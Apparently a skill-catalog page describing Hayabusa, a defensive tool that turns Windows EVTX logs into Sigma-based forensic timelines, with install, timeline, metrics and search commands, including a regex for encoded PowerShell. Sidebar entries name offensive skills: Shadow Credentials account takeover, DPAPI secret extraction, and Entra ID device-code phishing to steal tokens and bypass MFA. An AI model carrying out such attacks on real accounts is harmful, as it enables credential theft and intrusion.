菜单
Produce Sigma-based EVTX timelines and summaries with Hayabusa.
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
Extract DPAPI-protected secrets such as credentials and browser data offline and online.
Take over Active Directory user and computer accounts by writing alternate certificate keys to msDS-KeyCredentialLink (Shadow Credentials) with pyWhisker, Whisker, and Certipy, then authenticate via PKINIT.
Test vector stores for embedding inversion, cross-tenant leakage, and poisoning.
Enumerate Entra ID with ROADrecon and acquire and exchange tokens with roadtx.
Run OAuth 2.0 device-code and illicit-consent phishing against Microsoft Entra ID to steal access and refresh tokens, bypass MFA, and pivot across Microsoft 365 services.
Run Microsoft Entra ID tenant reconnaissance, token acquisition and manipulation, and federation backdoor testing with the AADInternals PowerShell toolkit to validate identity-attack resilience.
| name | generating-forensic-timelines-with-hayabusa |
| description | Produce Sigma-based EVTX timelines and summaries with Hayabusa. |
| domain | cybersecurity |
| subdomain | digital-forensics |
| tags | ["hayabusa","dfir","evtx","sigma","timeline","threat-hunting","windows-event-logs","forensics"] |
| version | 1.0 |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | ["RS.AN-03"] |
| mitre_attack | ["T1059.001"] |
Hayabusa (隼, Japanese for "peregrine falcon") is a Sigma-based threat-hunting and fast-forensics timeline generator for Windows event logs, developed by Yamato Security in Rust. It parses .evtx files (offline or via live analysis of a local host), applies a large built-in library of Sigma detection rules plus Hayabusa-specific rules, and produces a single, readable, chronological timeline of high-signal events with severity levels, MITRE ATT&CK tactics, and rule references. This collapses thousands of raw event-log records into a prioritized incident timeline that an analyst can review quickly.
Hayabusa is purpose-built for DFIR triage. Instead of loading EVTX into a SIEM, an investigator runs a single binary against a directory of collected logs and gets a CSV or JSON timeline plus metrics (events per computer, per Event ID, per channel). Because detections are Sigma-based, coverage tracks the open detection-engineering community, and rules can be updated on demand with update-rules. The tool's output integrates with downstream analysis: CSV opens in Timeline Explorer, JSONL feeds into jq, and timesketch-* profiles export directly into Timesketch.
A frequent finding in Hayabusa timelines is malicious PowerShell — MITRE ATT&CK T1059.001 (Command and Scripting Interpreter: PowerShell) — surfaced via Sigma rules over Event ID 4104 (script-block logging), 4103, and Sysmon process creation. This skill maps to NIST CSF RS.AN-03 (analysis is performed to establish what has taken place during an incident).
.evtx files into a prioritized timeline.# Linux example
curl -LO https://github.com/Yamato-Security/hayabusa/releases/latest/download/hayabusa-3.0.0-lin-x64-gnu.zip
unzip hayabusa-*.zip && cd hayabusa-*
./hayabusa-3.0.0-lin-x64-gnu --version
git clone https://github.com/Yamato-Security/hayabusa.git --recursive
cd hayabusa && cargo build --release
.evtx files (or run with --live-analysis on the host, as Administrator)../hayabusa update-rules
jq for JSONL..evtx files.| Technique ID | Official Name | Why Hayabusa Detects It |
|---|---|---|
| T1059.001 | Command and Scripting Interpreter: PowerShell | Sigma rules over Event IDs 4104/4103 and Sysmon flag malicious PowerShell |
| T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Rules over process-creation events surface suspicious cmd usage |
| T1078 | Valid Accounts | Logon events (4624/4625/4672) reveal anomalous authentication |
| T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Rules over registry-modification events flag persistence |
| T1053.005 | Scheduled Task/Job: Scheduled Task | Event ID 4698/106 rules surface task creation |
| T1003 | OS Credential Dumping | Rules flag LSASS access and credential-dumping patterns |
Pull the latest Sigma and Hayabusa rules before every investigation.
./hayabusa update-rules
Point Hayabusa at a directory of .evtx files and write a CSV timeline. -w skips the interactive wizard for scripted runs.
./hayabusa csv-timeline -d ./collected_evtx -o timeline.csv -w
# UTC timestamps for cross-host correlation
./hayabusa csv-timeline -d ./collected_evtx -o timeline_utc.csv -U -w
Profiles control detail. Use verbose to include MITRE ATT&CK tactics, tags, and the source rule/EVTX file; all-field-info to retain every original field.
# Verbose: adds MITRE tactics, tags, rule file, evtx file
./hayabusa csv-timeline -d ./collected_evtx -o timeline_verbose.csv -p verbose -w
# Preserve all original event fields
./hayabusa csv-timeline -d ./collected_evtx -o timeline_full.csv -p all-field-info -w
Available profiles: minimal, standard (default), verbose, all-field-info, all-field-info-verbose, super-verbose, timesketch-minimal, timesketch-verbose.
Focus triage on the highest-confidence detections with -m/--min-level.
./hayabusa csv-timeline -d ./collected_evtx -o critical.csv -m high -w
Levels: informational, low, medium, high, critical.
JSONL feeds cleanly into jq and downstream pipelines.
./hayabusa json-timeline -d ./collected_evtx -L -o timeline.jsonl -w
# Example: top rule titles
jq -r '.RuleTitle' timeline.jsonl | sort | uniq -c | sort -rn | head
Summaries reveal which hosts and Event IDs dominate, and pivot keywords give hunting leads.
./hayabusa computer-metrics -d ./collected_evtx -o computers.csv
./hayabusa eid-metrics -d ./collected_evtx -o eid.csv
./hayabusa log-metrics -d ./collected_evtx -o logs.csv
./hayabusa pivot-keywords-list -d ./collected_evtx -m medium -o pivots
Use the search command for keyword or regex hunting independent of detection rules.
# Keyword search (case-insensitive) for a suspicious binary
./hayabusa search -d ./collected_evtx -k "powershell" -i
# Regex search for base64-looking PowerShell encoded commands
./hayabusa search -d ./collected_evtx -r "-[Ee]nc(odedCommand)?\s+[A-Za-z0-9+/=]{20,}"
On the affected machine (Administrator), analyze local logs without exporting first.
./hayabusa csv-timeline -l -o live_timeline.csv -m high -w
| Tool | Purpose | Source |
|---|---|---|
| Hayabusa | Sigma-based EVTX timeline/threat hunting | https://github.com/Yamato-Security/hayabusa |
| hayabusa-rules | Sigma + Hayabusa detection rules | https://github.com/Yamato-Security/hayabusa-rules |
| Takajō | Hayabusa results analyzer | https://github.com/Yamato-Security/takajo |
| Timeline Explorer | Review CSV timelines | https://ericzimmerman.github.io/ |
| Timesketch | Collaborative timeline analysis | https://timesketch.org/ |
| Sigma | Generic detection rule format | https://github.com/SigmaHQ/sigma |
--version confirmed.update-rules before analysis..evtx directory.